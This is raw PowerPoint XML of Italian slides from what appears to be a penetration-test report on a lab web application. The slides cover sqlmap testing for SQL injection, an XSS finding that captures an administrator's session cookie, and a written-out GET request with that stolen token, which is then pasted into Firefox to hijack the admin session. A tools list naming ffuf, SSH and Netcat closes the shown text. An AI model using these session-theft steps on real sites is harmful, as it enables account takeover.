        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336402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 name="Group 15">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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – analisi manuale</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>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601193" y="703245"/>
            <a:ext cx="5431498" cy="1940921"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto dopo qualche secondo riceveremo il pacchetto contenente i cookie di sessione di uno degli amministratori.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto è più che evidente che quel campo di input è vulnerabile a XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8436BB0F-D4DA-012B-C3A4-40067878B793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3142941"/>
            <a:ext cx="10341613" cy="2740527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843965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7" name="Group 16">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 name="Straight Connector 17">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088653" y="725951"/>
            <a:ext cx="4927425" cy="1938525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3700" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3700"/>
              <a:t> mapping – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3700">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3700" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>assessment</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3700" cap="all" err="1">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Lucchetto su scheda madre del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0215D195-C68E-2607-ABED-EA430062FED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="7453" r="35564" b="4"/>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50" name="Right Triangle 49">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088653" y="2886116"/>
            <a:ext cx="4927425" cy="3245931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dopo aver individuato l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ulitima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> pagina ci chiediamo se è possibile effettuare attacchi di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQLInjection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per verificarlo usiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Rilevare una vulnerabilità di questo sito potrebbe tramutarsi in un grave rischio per gli utenti in quanto potrebbe esporre ad utenti non autorizzati informazioni sensibili e dati di accesso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1404521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6" name="Group 5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7" name="Straight Connector 5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7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9" name="Right Triangle 8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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100"/>
              <a:t> mapping – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>assessment</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3100" cap="all" err="1">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>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t>Possiamo ora analizzare il risultato di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{926B8583-F950-1BE4-0DF0-30710A071812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="963817"/>
            <a:ext cx="6401443" cy="4945114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1441858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0" y="20590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721945"/>
            <a:ext cx="10611627" cy="1916619"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>assessment</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" cap="all" err="1">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>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8" y="2893475"/>
            <a:ext cx="4981486" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Da questo risultato parziale si evince che il campo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> non è soggetto ad attacchi di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQLInjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e per questo bisognerà valutare la sua resistenza ad attacchi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, menu, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E135CDE1-4A38-DB0A-1145-97386C5F8BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3110016"/>
            <a:ext cx="5411775" cy="2800593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2101246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6" name="Group 5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8" name="Straight Connector 57">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37" name="Right Triangle 89">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8" name="Rectangle 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A348B8-3F2F-474A-A276-9C9066176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9" name="Picture 52" descr="Three arrows on bullseye">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055D540B-94F1-BD9F-E94B-96C2341810EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="13966" r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="140" name="Group 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46400ECE-9877-489B-9D66-A71DE0575C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5" name="Straight Connector 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A5D329-D649-4E9F-8096-A2ACE125E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92DB4E-8447-45DB-9823-5CFC7C66C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5D5DFBD-BCEC-48CF-808D-F7E1C14047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61903FC-FD80-4FBD-AA8A-C2193BC9C3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D55ECC-9F8E-4CA7-B6E4-B16810D9A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B70EC0-20B9-4B4E-92A9-EC13F4DF03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E75303-322B-4EE7-823D-F77D7EF54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9F1C7D3-2BCC-49A7-B6F7-5A186ADDD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F4F36A6-486F-4AD6-9A4D-8287F046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B7EBF09-A754-4C44-A040-2B439F27D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D6C4580-856F-4186-B589-28D864BB53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A808157-3585-4AB1-9749-F9A67F988B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946DFD7-0F51-48C5-A9D1-6792FFC26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8CB18E0-7882-4E21-9A48-1A54F4445F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9A3F90D-FBDD-4CF7-872C-040EF586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4E87E7-02B5-4FD8-866D-A8F25F5DD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573020-73D6-4060-BFD2-F0A63261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C3845D-5E59-4D90-9D5C-76ED34F4EF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3B5D9CF-B022-4B61-84CC-9CE47428D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FA28D78-4A5A-40AC-8EA0-AE36CD6A3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FD55823-36C9-47C0-B8B3-7BA814BE0B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63E8057-634C-41C8-9352-31517F5529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4380C6A-DAC6-4C80-A2B1-341AD173F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0C73B68-20DB-4B0D-BDFC-46D2E2DFA3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5C3543E-8CC7-4D2C-A1B6-3260366B7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FA75029-DAD3-4FA3-9603-6CF2C96C2A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9E0D540-01C4-47A7-8F32-603003412B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CD20989-6E8E-45DA-81C2-E2615D8DB1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F5210F8-5C9F-47B3-B18D-EA0DDAFE8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0670A10-674D-4A17-9F65-1BFD98FF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36A5B2-61EC-401D-8CCC-7C2CE96F1D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41" name="Rectangle 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8606225D-3AFB-411A-A409-9199957FC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rgbClr val="000000">
                  <a:alpha val="30000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="000000">
                  <a:alpha val="15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1182775" y="1800353"/>
            <a:ext cx="9820188" cy="1628647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124157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 name="Group 15">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9" name="Freeform: Shape 48">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ight Triangle 50">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336275" y="725951"/>
            <a:ext cx="5696415" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto visto che abbiamo constato che un campo di input era vulnerabile ad attacchi di tipo XSS possiamo passare alla parte di exploit in cui andiamo ad utilizzare il token di sessione da amministratore per poter attaccare l’asset.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET /session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zkwcjg.ntKJ4zBLCtRSaeea-V5fijKrS_Q HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>L’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ouput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> dovrebbe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>assomogliare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> a questo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2087DFE8-176A-E0E0-7A50-0DF10A0A6A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3181722"/>
            <a:ext cx="10341613" cy="2662965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065577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Lo andiamo ad inserire all’interno dei cookies di Firefox per ottenere la sessione da amministratore.</a:t>
            </a:r>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68352A31-F926-547E-9980-6167BF81D014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1283889"/>
            <a:ext cx="6401443" cy="4304970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492767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0" name="Freeform: Shape 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0115EBFC-7EA0-B76F-3278-2CCB2405B1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725951"/>
            <a:ext cx="4923187" cy="5417452"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Strumenti utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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egnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBE6CD7-CBC6-8880-241C-CD1375091DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086745" y="713048"/>
            <a:ext cx="4414176" cy="5449532"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ffuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Faster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) 2.1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - Versione 9.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(GNU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
